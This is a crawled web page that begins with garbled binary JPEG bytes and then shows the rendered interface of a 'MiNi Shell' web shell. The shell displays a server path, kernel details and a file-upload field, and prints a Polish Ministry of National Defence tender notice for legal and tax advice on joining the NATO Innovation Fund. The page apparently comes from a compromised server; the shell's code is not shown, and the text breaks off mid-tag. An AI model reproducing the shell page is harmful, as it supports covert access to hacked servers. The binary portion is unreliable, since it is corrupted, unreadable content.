JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221004/0037725501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa prawna w zakresie doradztwa prawno-podatkowego przy transakcji przystąpienia do Funduszu Innowacyjności NATO na prawie luksemburskim. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ministerstwo Obrony Narodowej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014872806</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Niepodległości 218</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-911</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mon.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/obrona-narodowa</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa prawna w zakresie doradztwa prawno-podatkowego przy transakcji przystąpienia do Funduszu Innowacyjności NATO na prawie luksemburskim. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a2b5d6e5-42f5-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00377255</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00073137/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.12 Usługa prawna w zakresie doradztwa prawno-podatkowego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/mon <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Zamawiający na podstawie art. 280 ust. 2 ustawy pzp, z uwagi na sytuację określoną <br/>w art. 65 ust. 1 udostępnia część SWZ w sposób określony w niniejszym rozdziale. <br/>1.	Zamawiający przewiduje udostępnienie umowy „Limited Partnership Agreement” – LPA. (rekomendowane, ale nieobowiązkowe, na wniosek wykonawców)<br/>2.	Na wniosek wykonawcy, złożony przed upływem terminu składania ofert, zamawiający udostępni dokumentację o poufnym charakterze (zwaną dalej „dokumentacją wrażliwą”), będącą przedmiotem analizy i tłumaczenia, tj. umowę „Limited Partnership Agreement” – LPA.<br/>3. Sposób przekazywania dokumentacji wrażliwej:<br/>1)	wykonawca zwraca się za pośrednictwem platformy zakupowej do zamawiającego <br/>o przekazanie dokumentacji wrażliwej, składając wniosek, w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, zgodnie z wzorem stanowiącym załącznik nr 12 do SWZ.<br/>2)	dokumentacja wrażliwa zostanie przesłana drogą elektroniczną, na adres e-mail podany we wniosku.<br/>3)	w przypadku niewskazania przez wykonawcę właściwego adresu e-mail, zamawiający pozostawi wniosek bez rozpoznania;<br/>4)	wniosek powinien zawierać w szczególności:<br/>a)	nazwę i adres wykonawcy (wnioskodawcy);<br/>b)	imię i nazwisko osoby lub osób, które będą miały dostęp do dokumentacji oraz służbowy adres e-mail.<br/>4.	Do wniosku o przekazanie dokumentów wrażliwych wykonawca dołączy: <br/>1)	oświadczenie wykonawcy o nieudostępnianiu przekazanej dokumentacji wrażliwej innym osobom i podmiotom niezwiązanym z przygotowaniem oferty oraz ich publikacją (m. in. w Internecie),<br/>2)	zobowiązanie wykonawcy do zniszczenia wszelkich kopii i ich usunięcia <br/>z informatycznych nośników danych przekazanej dokumentacji wrażliwej na użytek (potrzebę) przygotowania przez wykonawcę oferty do dnia składania ofert.<br/>5.	Przekazanie dokumentacji wrażliwej nastąpi nie wcześniej niż w następnym dniu roboczym po dniu złożenia wniosku o przekazanie dokumentacji wrażliwej. <br/>6.	Zamawiający zaleca, aby dostęp do wskazanego przez wykonawcę adresu e-mail, <br/>na który zostanie przesłana dokumentacja wrażliwa był ograniczony.<br/>7.	Zamawiający zastrzega możliwość nieprzedłużenia terminu składania ofert bez względu <br/>na datę złożenia wniosku o przekazanie dokumentacji wrażliwej.<br/>8.	Wykonawca najpóźniej w dniu składania ofert, za pośrednictwem platformy zakupowej przekaże zamawiającemu: <br/>1)	oświadczenie wykonawcy o zniszczeniu wszelkich kopii otrzymanej dokumentacji wrażliwej i ich usunięciu z informatycznych nośników danych,<br/>2)	potwierdzony przez wykonawcę wykaz osób zapoznanych z przekazaną dokumentacją wrażliwą. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/mon</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Pod pojęciem „platforma zakupowa” należy rozumieć aplikację/program komputerowy przeznaczony do realizacji procesu związanego z przeprowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego w formie elektronicznej:<br/>1)	zamawiający wykorzystuje platformę zakupową Smart PZP;<br/>2)	adres strony internetowej platformy zakupowej: <br/>https://portal.smartpzp.pl/mon <br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez platformę zakupową.<br/>3. Za pośrednictwem posiadanego na platformie zakupowej konta Użytkownika Zewnętrznego tj. użytkownika wykonawcy odbywa się komunikacja wykonawcy z zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania.<br/>4.	Za pośrednictwem posiadanego na platformie zakupowej konta Jednostki Zamawiającej oraz kont Użytkowników Wewnętrznych Jednostki Zamawiającej odbywa się komunikacja zamawiającego z wykonawcą w postępowaniu, w szczególności: przekazywanie wezwań i zawiadomień, informacji, odpowiedzi na pytania w ramach postępowania.<br/>5.	Do pełnego i prawidłowego korzystania z platformy zakupowej przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego wykonawcy kwalifikowanego podpisu elektronicznego służącego do autentykacji i podpisu.<br/>6.	Korzystanie z platformy zakupowej możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy wykonawcy minimalnych wymagań technicznych i specyfiki połączenia opisanych szczegółowo w SWZ.<br/>7.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług platformy zakupowej (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning.<br/>8.	Korzystanie z platformy zakupowej przez wykonawców jest bezpłatne. <br/>9.	Użytkownikom Zewnętrznym wykonawcy przysługuje prawo korzystania z asysty obejmującej wsparcie techniczne w kwestiach dotyczących korzystania z platformy zakupowej, polegające na doradztwie telefonicznym i e-mailowym.<br/>10.	Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem platformy zakupowej wynosi 100 MB. Za pośrednictwem platformy zakupowej można przesłać wiele pojedynczych plików lub plik skompresowany do archiwum (ZIP) zawierający wiele pojedynczych plików.<br/>12.	Za datę przekazania i odbioru danych, w szczególności oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń oraz innych informacji przyjmuje się datę zapisania pliku na serwerze platformy zakupowej. Aktualna data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu platformy zakupowej.<br/>13.	Ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy pzp, zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy pzp, oświadczenie, o którym mowa w art. 117 ust. 4 ustawy pzp, podmiotowe środki dowodowe, przedmiotowe środki dowodowe, pełnomocnictwo sporządza się w postaci elektronicznej, składa się, pod rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, zgodnie z art. 63 ust. 2 ustawy pzp.<br/>14.	Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Ochrona danych osobowych1. Zgodnie z art. 13 ust. 1 i 2 RODO tj. rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), zamawiający informuje wykonawcę, że: 1) administratorem danych osobowych jest Minister Obrony Narodowej/Ministerstwo Obrony Narodowej z siedzibą w Warszawie, przy al. Niepodległości 218, tel. +48 22 628 00 31; 2) administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować poprzez pocztę elektroniczną na adres: iod@mon.gov.pl lub listownie na adres: Ministerstwo Obrony Narodowej, al. Niepodległości 218, 00–911 Warszawa, z dopiskiem „Inspektor Ochrony Danych”; 3) dane osobowe będą przetwarzane w celu przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego, na podstawie art. 6 ust. 1 lit. c RODO; 4) dane osobowe mogą być przekazywane podmiotom przetwarzającym dane osobowe na zlecenie administratora, a także osobom lub podmiotom, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy pzp; 5) dane osobowe nie będą przekazywane do państwa trzeciego ani organizacji międzynarodowej; 6) dane osobowe pozyskane w związku z postępowaniem będą przechowywane, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres przechowywania obejmuje cały czas trwania umowy; 7)<br/>w odniesieniu do danych osobowych osób uczestniczących w przedmiotowym postępowaniu decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO; 8) osobie, której dane osobowe dotyczą przysługują prawa określone w rozdziale 3 SWZ. 9) osobie, której dane osobowe dotyczą nie przysługują prawa określone w rozdziale 3 SWZ. 10) obowiązek podania przez wykonawcę danych osobowych bezpośrednio jego dotyczących oraz danych osobowych osób uczestniczących w postępowaniu jest wymogiem określonym w przepisach ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia; konsekwencje niepodania określonych<br/>danych wynikają z ustawy pzp. 2. Wykonawca ubiegając się o udzielenie zamówienia jest zobowiązany do wypełnienia wszystkich obowiązków formalno – prawnych związanych z udziałem w postępowaniu, w tym obowiązków wynikających z RODO. W związku z powyższym, wykonawca zobowiązany jest do złożenia w postępowaniu o udzielenie zamówienia oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO, zgodnie z treścią zawartą w załączniku nr 1 do SWZ.<br/>3. Podwykonawca jest zobowiązany podczas pozyskiwania danych osobowych na potrzeby przedmiotowego postępowania o udzielenie zamówienia wypełnić obowiązek informacyjny wynikający z RODO względem osób fizycznych, których dane osobowe dotyczą, i od których dane te bezpośrednio pozyskał. 4. Powyższe postanowienia dotyczą danych osobowych osób fizycznych, bezpośrednio od nich pozyskanych, a w szczególności danych osobowych wskazanych w rozdziale 3 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">23/ZP/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa prawna w zakresie doradztwa prawno-podatkowego przy transakcji przystąpienia do Funduszu Innowacyjności NATO na prawie luksemburskim.<br/>Szczegółowy opis przedmiotu zamówienia zawiera w szczególności:<br/>1)	Załącznik nr 2 do SWZ – Projektowane postanowienia umowy;<br/>2)	Załącznik nr 3 do SWZ – Opis przedmiotu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79221000-9 - Usługi w zakresie doradztwa podatkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający, na podstawie art. 441 ustawy pzp, może skorzystać z prawa opcji w sytuacji uzasadnionej potrzeby związanej z procesem przystąpienia do Funduszu. <br/>Zamawiający zastrzega sobie prawo ewentualnego zwiększenia wielkości zamówienia podstawowego w ramach prawa opcji do wysokości łącznej kwoty 15 000 zł netto i liczby roboczogodzin zaproponowanych przez wykonawcę, nie mniejszej niż 10 roboczogodzin. Roboczogodzina oznacza godzinę zegarową (60 minut).<br/>Zamawiający przewiduje skorzystanie z prawa opcji w zakresie dodatkowych konsultacji zagadnień prawnych i podatkowych związanych z LPA i dokumentacją towarzyszącą, w tym Subscription Agreement w związku z przystąpieniem zamawiającego do Funduszu <br/>i zatwierdzeniem przez Zamawiającego treści LPA i dokumentacji towarzyszącej. <br/>Zamawiający może z prawa opcji nie skorzystać. Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Nieskorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium „cena” dotyczy ceny za realizację zamówienia podstawowego zaoferowanej przez wykonawcę (podkryterium „cena zamówienia podstawowego”) oraz zadeklarowanej liczby roboczogodzin w zakresie konsultacji zagadnień prawnych związanych z LPA i dokumentacją towarzyszącą, w tym Subscription Agreement w związku z przystąpieniem zamawiającego do Funduszu i zatwierdzeniem przez zamawiającego treści LPA i dokumentacji towarzyszącej, którą zamawiający określił w prawie opcji (podkryterium „liczba roboczogodzin prawa opcji’)<br/><br/>W kryterium „cena&#34; oferta może otrzymać maksymalnie 55 punktów. Liczba punktów w ww. kryterium obliczona zostanie wg wzoru: C=Cmin / Cof x 50 +R<br/><br/>gdzie:<br/><br/>C - liczba punktów jakie otrzyma oferta badana w kryterium „cena” (C)<br/>C min. - najniższa oferowana cena zamówienia podstawowego spośród wszystkich ważnych ofert<br/>C of. - cena zamówienia podstawowego oferty badanej<br/>50 - oznacza wagę podkryterium „cena zamówienia podstawowego”<br/>R - liczba punktów przyznanych w podkryterium „liczba roboczogodzin prawa opcji”<br/><br/>Wykonawca w kryterium „cena” w podkryterium „liczba roboczogodzin prawa opcji”, może otrzymać maksymalnie 5 punktów. Zamawiający przyzna 0,50 pkt za każdą roboczogodzinę powyżej określonego minimum (10 roboczogodzin) w prawie opcji.<br/><br/><br/>Kryterium nr 2 – Doświadczenie osób wyznaczonych do realizacji zamówienia (D)<br/>Kryterium doświadczenie osób wyznaczonych do realizacji zamówienia dotyczy premiowania ofert, które oferują realizację zamówienia przez osoby mające doświadczenie większe niż wymagane na spełnienie warunku udziału w postępowaniu. <br/><br/>W kryterium „kryterium doświadczenie osób wyznaczonych do realizacji zamówienia &#34; oferta może otrzymać maksymalnie 40 punktów. Liczba punktów w ww. kryterium przyznana będzie w następujący sposób:<br/><br/>Zamawiający przyzna 10 punktów za każdy rok doświadczenia najbardziej doświadczonej osoby z zespołu wykonawcy wyznaczonego do realizacji przedmiotowego zamówienia z tytułem radcy prawnego lub adwokata lub doradcy podatkowego(tj. doświadczenie zdobyte po uzyskaniu uprawnień zawodowych), ponad liczbę lat doświadczenia zawodowego, wymaganego <br/>w warunkach udziału w postępowaniu).<br/><br/><br/>Kryterium nr 3 – Kryterium społeczne (S):<br/>Kryterium społeczne dotyczy zatrudnienia przez wykonawcę do realizacji zamówienia osób niepełnosprawnych, o których mowa w przepisach o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych. <br/><br/>W kryterium „kryterium społeczne&#34; oferta może otrzymać maksymalnie 5 punktów. Liczba punktów w ww. kryterium przyznana będzie w następujący sposób:<br/>- oferta wykonawcy, który nie zobowiąże się do zatrudnienia osoby niepełnosprawnej, która będzie brała udział w realizacji przedmiotowego zamówienia, otrzyma 0 pkt.<br/>- oferta wykonawcy, który zobowiąże się do zatrudniania co najmniej 1 osoby niepełnosprawnej, która będzie brała udział w realizacji przedmiotowego zamówienia zamawiającego otrzyma 5 pkt.<br/><br/>Obliczenie łącznej liczby punktów uzyskanych przez wykonawcę (spośród ofert podlegających ocenie) zostanie dokonane na podstawie sumy uzyskanych punktów w kryterium „cena”, kryterium „doświadczenie osób wyznaczonych do realizacji zamówienia” oraz kryterium „kryterium społeczne”, zgodnie ze wzorem: P = C + D + S<br/><br/>gdzie:<br/>P – łączna liczba punktów (suma) przyznanych wykonawcy w ramach wszystkich kryteriów oceny ofert<br/>C – liczba punktów przyznanych wykonawcy w kryterium „cena”<br/>D – liczba punktów przyznanych wykonawcy w kryterium „doświadczenie osób wyznaczonych do realizacji zamówienia”<br/>S – liczba punktów przyznanych wykonawcy w kryterium „kryterium społeczne”<br/><br/>Zamawiający wybierze jako najkorzystniejszą ofertę wykonawcy, który uzyskał najwyższą liczbę punktów w ocenie punktowej. <br/>Szczegółowy opis kryteriów oceny ofert zawiera SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">55</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 